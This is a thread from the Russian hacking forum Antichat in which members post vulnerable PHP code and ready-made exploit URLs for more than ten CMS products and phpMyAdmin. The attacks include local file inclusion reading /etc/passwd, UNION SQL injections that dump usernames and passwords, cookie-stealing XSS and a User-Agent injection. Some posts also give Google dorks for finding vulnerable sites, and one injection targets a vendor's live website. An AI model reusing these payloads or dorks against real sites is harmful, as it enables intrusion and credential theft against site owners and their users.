Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

21.12.2008, 21:22
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
iGaming CMS
Файл: lang.php
Уязвимый код:
Код:
if(isset($_GET['lang']))
$include_lang = $_GET['lang'];
}
elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
{
include_once(TOP_DIR.'/functions/db_api.php');
$include_lang = get_language();
}
else
{
$include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
Код:
http://path/docs/index.php?lang=/../../../../../../../../../../test
Если magic_quotes_gpc = Off,тогда:
Код:
http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
Файл: install.php
Уязвимый код:
Код:
switch($_GET['whatlang'])
{
case 1:
include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
break;
default:
include_once(TOP_DIR.'/lang/lang.English.php');
break;
}
Код:
http://path/install.php?whatlang=1&language=/../../../../../../../test
Если magic_quotes_gpc = Off,то:
Код:
http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00
SQL иньекция:
Код:
http://path/index.php?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*
XSS иньекция:
Код:
http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
Последний раз редактировалось baltazar; 22.12.2008 в 23:52..
|
|
|

22.12.2008, 17:08
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
Wheatblog
Файл: main.php
Кусок уязвимого кода:
Код:
$config = ereg_replace(":","", $config);
$config = trim(ereg_replace("../","", $config));
$config = trim(ereg_replace("/","", $config));
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
Код:
http://path/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
Если magic_quotes_gpc =ON,то:
Код:
http://path/main.php?config=eregi.inc.php\..\admin\.htaccess
XSS иньекция:
Код:
http://path/index.php?action=category&id=<script>alert(document.cookie)</script>
|
|
|

23.12.2008, 19:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
&
p.w.p. author & author
charname_change.php:
Код:
...
$guid = addslashes($_GET["guid"]);
...
$sql = "SELECT guid, account, CAST(SUBSTRING_INDEX(SUBSTRING_INDEX(`data`, ' ', 1462), ' ', -1) AS UNSIGNED) AS `money`, name FROM characters WHERE guid=$guid AND account=$id";
...
mod spora author
guild.php:
Код:
...
$_GET['page'] = !isset($_GET['page'])?'guilds':$_GET['page'];
...
include("./module/".$_GET['page'].".php");
...
wow-ultimate author
gilds.php:
Код:
...
if (@$_GET['guid']) {
$guildid = addslashes($_GET['guid']);
...
$query_leader_name = $characters_db->query("SELECT * FROM `characters` WHERE `guid` IN (SELECT `guid` FROM `guild_member` WHERE `guildid`=".$guildid.") ORDER by `name`");
...
block-center.php:
Код:
<?php
if (!$menu = &$_GET['page'])
$menu=$main_page;
print "<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
<td width=\"100%\" valign=\"top\" align=\"center\" >";
require_once("modules/$menu.php");
print "</td></tr></table>";
?>
MiniManager author
дофига скулей  , cвн
|
|
|

28.12.2008, 20:04
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
FGS_Studio cms
sql inj в параметре content_id
например на сайте производителя:
http://fgs.kiev.ua/index.php?lang_id=1&menu_id=1&&content_id=-1+union+select+1,2,3,4,5,6,7,concat(user,0x3c,user pass),9,10,11,load_file(0x3a)+from+user--+
исходники найти не удалось - колонки угадывались методом научного тыка).
dork:
inurl:lang_id= inurl:menu_id=
|
|
|

08.01.2009, 02:23
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
FuzzyLime CMS
FuzzyLime CMS
SQL Иньекция:
Код:
http://site/shop_showcat.php?='%20UNION%20ALL%20SELECT%201,2,3,4,5,6,concat(username,':',passwrd)%20from%20users/*
Локальный Инклуд:
Файл:index.php :
Уязвимый кусок кода:
Код:
<?php readfile($Root.$Path); ?> <---[xxx]
<form action="application_loader.php" method="post">
Код:
http://site/index.php?Root=../../../../../../etc/password
Код:
http://index.php?Path=../../../../../../etc/password
XSS:
Код:
http://site/login.php?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Последний раз редактировалось baltazar; 08.01.2009 в 20:24..
|
|
|

08.01.2009, 20:39
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
yBlog
Локальный Инклуд:
Файл: pc.lib.php
Кусок уязвимого кода:
Код:
if (!isset($g_pc_lib_dir))
$g_pc_lib_dir = "lib";
...
$g_pc_extension = "php";
if (!defined("PCLERROR_LIB"))
{
include("data/inc/$g_pc_lib_dir/pclerror.lib.$g_pcltar_extension");
}
if (!defined("PCLTRACE_LIB"))
{
include("data/inc/$g_pc_lib_dir/pcltrace.lib.$g_pcltar_extension");
Код:
http://site/inc/lib/pc.lib.php?g_pc_lib_dir=../../../../../../../../../../../../../etc/passwd%00
SQL Иньекция:
Код:
http://site/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
XSS Иньекция:
Код:
http://site/yblog/user.php?n=<script>alert(/xss/)</script>
|
|
|

14.01.2009, 15:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
webspell cms 4.01.02 dev
articles.php:
Код:
...
$title = $_POST['title'];
$message = $_POST['message'];
$link1 = $_POST['link1'];
$url1 = $_POST['url1'];
$window1 = $_POST['window1'];
$link2 = $_POST['link2'];
$url2 = $_POST['url2'];
$window2 = $_POST['window2'];
$link3 = $_POST['link3'];
$url3 = $_POST['url3'];
$window3 = $_POST['window3'];
$link4 = $_POST['link4'];
$url4 = $_POST['url4'];
$window4 = $_POST['window4'];
$comments = $_POST['comments'];
$articlesID = $_POST['articlesID'];
safe_query("UPDATE ".PREFIX."articles SET
title='".mysql_escape_string($title)."',
content='".mysql_escape_string($message)."',
link1='".mysql_escape_string($link1)."',
url1='".mysql_escape_string($url1)."',
window1='".mysql_escape_string($window1)."',
link2='".mysql_escape_string($link2)."',
url2='".mysql_escape_string($url2)."',
window2='".mysql_escape_string($window2)."',
link3='".mysql_escape_string($link3)."',
url3='".mysql_escape_string($url3)."',
window3='".mysql_escape_string($window3)."',
link4='".mysql_escape_string($link4)."',
url4='".mysql_escape_string($url4)."',
window4='".mysql_escape_string($window4)."',
saved='1', comments='$comments' WHERE articlesID='$articlesID'");
whoisonline.php:
$sort = $_GET['sort'];
$type = $_GET['type'];
...
$ergebnis = safe_query("SELECT * FROM ".PREFIX."whoisonline ORDER BY $sort $type");
dork:
inurl:site=whoisonline inurl:desc
шелл заливается либо через squads:
либо через шаблоны
|
|
|
Уязвимости различных CMS и скриптов |

19.01.2009, 06:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме: 7144817
Репутация:
1503
|
|
Уязвимости различных CMS и скриптов
Создал эту тему, дабы не плодить кучу тем с найдеными мной (либо не мой) уязвимостями в недоCMS и прочих интересных продуктах! =)
Сайт производитель: http://wdt.org.ru
Продукт: DPortal
Версия: 1.1
(wap-CMS)
Локальное чтение файлов:
http://site.ru/file/opis.php?ver=html&login=Twoster&pas=&katal=Upgrade s&file=../../uzer/Admin%00
XSS (Повсюду):
http://site.ru/file/obzor.php?ver=html&pas="><script>alert()</script>&katal=Upgrades
http://site.ru/file/obzor.php?ver=html"><script>alert()</script>&pas=&katal=Upgrades
http://site.ru/file/obzor.php?ver=html&pas=&katal=Upgrades"><script>al ert()</script>
http://site.ru/file/opis.php?ver=html&login=Twoster&pas=&katal=Upgrade s&file=Upgrade1.zip"><script>alert()</script>
http://site.ru/gbyk/say.php?ver=html&pas=&login=&obr=-Twost"><script>alert()</script>
Сайт производитель: http://steadycms.ru/
Продукт: Steady-CmS
Версия: 5.5
(wap-CMS)
SQL-inj
По всему скрипту не фильтруется User-agent.
Примерный эксплойт:
Opera/9.51 (Windows NT 5.1; U; ru)',sex='m
Сайт производитель: http://linkorcms.ru/
Продукт: LinkorCMS
Версия: 1.2
XSS
1. http://cms.ru/index.php?name=search&op=search
Уязвимо поле поиска : searchstr
2. http://cms.ru/index.php?name=user&op=registration
2.1 Ваше имя на сайте - переменная nikname
2.2 Настоящее имя(Ф.И.О.) - переменная realname
2.3 Сайт - переменная homepage
2.4 Город - переменная city
Сайт производитель: www.phpmyadmin.net/
Продукт: phpMyAdmin 2.6.1
Версия: 2.6.1
Расскрытие путей
http://localhost/Tools/phpMyAdmin/tbl_properties.php?lang[]=ru-win1251
http://localhost/Tools/phpMyAdmin/tbl_properties.php?server[]=1
http://localhost/Tools/phpMyAdmin/tbl_properties.php?collation_connection[]=cp1251_general_ci
http://localhost/Tools/phpMyAdmin/tbl_properties.php?db[]=aaa&table=aaa
http://localhost/Tools/phpMyAdmin/sql.php?sql_query[]=
http://localhost/Tools/phpMyAdmin/server_export.php?convcharset[]=iso-8859-1
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|

20.01.2009, 13:53
|
|
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме: 161729
Репутация:
67
|
|
Обзор уязвимостей OpenX 2.6.3
Раскрытие путей:
Код:
/openx/www/api/v1/common/BaseAdvertiserService.php
/openx/www/api/v1/common/BaseAgencyService.php
/openx/www/api/v1/common/BaseBannerService.php
/openx/www/api/v1/common/BaseCampaignService.php
/openx/www/api/v1/common/BaseLogonService.php
/openx/www/api/v1/common/BasePublisherService.php
/openx/www/api/v1/common/BaseServiceImpl.php
/openx/www/api/v1/common/BaseUserService.php
/openx/www/api/v1/common/BaseZoneService.php
/openx/www/api/v1/common/XmlRpcUtils.php
/openx/www/api/v1/xmlrpc/AdvertiserServiceImpl.php
/openx/www/api/v1/xmlrpc/AgencyServiceImpl.php
/openx/www/api/v1/xmlrpc/BannerServiceImpl.php
/openx/www/api/v1/xmlrpc/CampaignServiceImpl.php
/openx/www/api/v1/xmlrpc/LogonServiceImpl.php
/openx/www/api/v1/xmlrpc/PublisherServiceImpl.php
/openx/www/api/v1/xmlrpc/UserServiceImpl.php
/openx/www/api/v1/xmlrpc/ZoneServiceImpl.php
/openx/www/admin/config.php
/openx/plugins/3rdPartyServers/3rdPartyServers.php
/openx/plugins/3rdPartyServers/adtech/adtech.plugin.php
/openx/plugins/3rdPartyServers/atlas/atlas.plugin.php
/openx/plugins/3rdPartyServers/bluestreak/bluestreak.plugin.php
/openx/plugins/3rdPartyServers/cpx/cpx.plugin.php
/openx/plugins/3rdPartyServers/doubleclick/doubleclick.plugin.php
/openx/plugins/3rdPartyServers/eyeblaster/eyeblaster.plugin.php
/openx/plugins/3rdPartyServers/falk/falk.plugin.php
/openx/plugins/3rdPartyServers/google/google.plugin.php
/openx/plugins/3rdPartyServers/kontera/kontera.plugin.php
/openx/plugins/3rdPartyServers/max/max.plugin.php
/openx/plugins/3rdPartyServers/mediaplex/mediaplex.plugin.php
/openx/plugins/3rdPartyServers/tangozebra/tangozebra.plugin.php
/openx/plugins/3rdPartyServers/tradedoubler/tradedoubler.plugin.php
/openx/plugins/3rdPartyServers/ypn/ypn.plugin.php
/openx/plugins/Maintenance/Maintenance.php
/openx/plugins/authentication/Authentication.php
/openx/plugins/authentication/cas/cas.plugin.php
/openx/plugins/authentication/cas/OaCasClient.php
/openx/plugins/authentication/cas/Controller/ConfirmAccount.php
/openx/plugins/authentication/cas/Central/RpcMapper.php
/openx/plugins/authentication/cas/Central/Cas.php
/openx/plugins/authentication/cas/CAS/PGTStorage/pgt-db.php
/openx/plugins/authentication/cas/CAS/PGTStorage/pgt-file.php
/openx/plugins/authentication/cas/CAS/languages/english.php
/openx/plugins/authentication/cas/CAS/languages/french.php
/openx/plugins/authentication/cas/CAS/languages/german.php
/openx/plugins/authentication/cas/CAS/languages/greek.php
/openx/plugins/authentication/cas/CAS/languages/japanese.php
/openx/plugins/authentication/internal/internal.plugin.php
/openx/plugins/channelDerivation/ChannelDerivation.php
/openx/plugins/channelDerivation/mysql/mysql.plugin.php
/openx/plugins/channelDerivation/xmlrpc/xmlrpc.plugin.php
/openx/plugins/deliveryLimitations/Client/Browser.delivery.php
/openx/plugins/deliveryLimitations/Client/Browser.plugin.php
/openx/plugins/deliveryLimitations/Client/Domain.delivery.php
/openx/plugins/deliveryLimitations/Client/Domain.plugin.php
/openx/plugins/deliveryLimitations/Client/Ip.delivery.php
/openx/plugins/deliveryLimitations/Client/Ip.plugin.php
/openx/plugins/deliveryLimitations/Client/Language.delivery.php
/openx/plugins/deliveryLimitations/Client/Language.plugin.php
/openx/plugins/deliveryLimitations/Client/Os.delivery.php
/openx/plugins/deliveryLimitations/Client/Os.plugin.php
/openx/plugins/deliveryLimitations/Client/Useragent.delivery.php
/openx/plugins/deliveryLimitations/Client/Useragent.plugin.php
/openx/plugins/deliveryLimitations/DeliveryLimitations.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsArrayData.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsCommaSeparatedData.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsResourceData.php
/openx/plugins/deliveryLimitations/Geo/Areacode.delivery.php
/openx/plugins/deliveryLimitations/Geo/Areacode.plugin.php
/openx/plugins/deliveryLimitations/Geo/City.delivery.php
/openx/plugins/deliveryLimitations/Geo/Organisation.delivery.php
/openx/plugins/statisticsFieldsTargeting/statisticsFieldsTargeting.php
/openx/plugins/statisticsFieldsTargeting/default/default.plugin.php
/openx/plugins/statisticsFieldsDelivery/statisticsFieldsDelivery.php
/openx/plugins/statisticsFieldsDelivery/default/default.plugin.php
/openx/plugins/statisticsFieldsDelivery/affiliates/affiliates.plugin.php
/openx/plugins/reports/admin/breakdown.plugin.php
/openx/plugins/reports/Reports.php
Узнаем версию:
/openx/UPGRADE.txt
/openx/TRANSLATIONS.txt
/openx/RELEASE_NOTES.txt
SQL Injection (Нужны права администратора):
Код:
/openx/www/admin/campaign-banners.php?clientid=1)+union+select+1,2,concat(us ername,0x3a,password),4,5+from+ox_users/*&campaignid=1
Код:
/openx/www/admin/campaign-edit.php?clientid=3)+union+select+1,2,concat(usern ame,0x3a,password),4,5+from+ox_users/*&campaignid=5
Код:
/openx/www/admin/banner-acl.php?clientid=1&campaignid=3&bannerid=1)+union+select+1,2,concat(username,0x3a, password),4,5,6+from+ox_users/*
SQL Инъекции валидны только тогда когда добавлено хотя бы одна учетная запись.
Активная XSS
При добавлении новой учетной записи уязвимые поля: "Имя" и "Контакты".
При добавлении нового клиента узвимы поля: "Имя", "Контакт" и "Комментарии".
При добавлении нового сайта уязвимы поля: "URL веб-сайта", "Имя" и "Контакт"
При добавлении новой зоны уязвимы поля: "Описание" и "Комментарий"
При добавлении нового канала таргетинга уязвимы поля: "Имя", "Описание" и "Комментарии".
При добавлении нового трекера уязвимы поля: "Имя" и "Описание"
Фильтрации нет вообще.
Пасивная XSS
Код:
/openx/www/admin/tracker-append.php?clientid=[CODE_XSS]&trackerid=1%27
/openx/www/admin/advertiser-trackers.php?clientid=[CODE_XSS]
Бояню от сюда: http://209.85.129.132/search?q=cache:yPQ62-iGZbcJ:https://forum.antichat.ru/showthread.php%3Fp%3D1038739+antichat.ru+openx
|
|
|

24.01.2009, 03:23
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
производитель: kan-studio.ru
продукт Kandidat CMS v.1.3.1
pXSS
всё работает при register_globals=on
Код HTML:
http://kandidat/admin/login.php?contentcenter=123'%22%3E%3Cscript%3Ealert(1)%3C/script%3E
в исходнике проверяется лишь наличие куков, а на содержание пофик
Код HTML:
get http://kandidat/media/upload.php?contentcenter=<script>alert(1)</script> HTTP/1.0
Host: kandidat
Cookie: KNcookies=123;
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Proxy-Connection: Keep-Alive
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|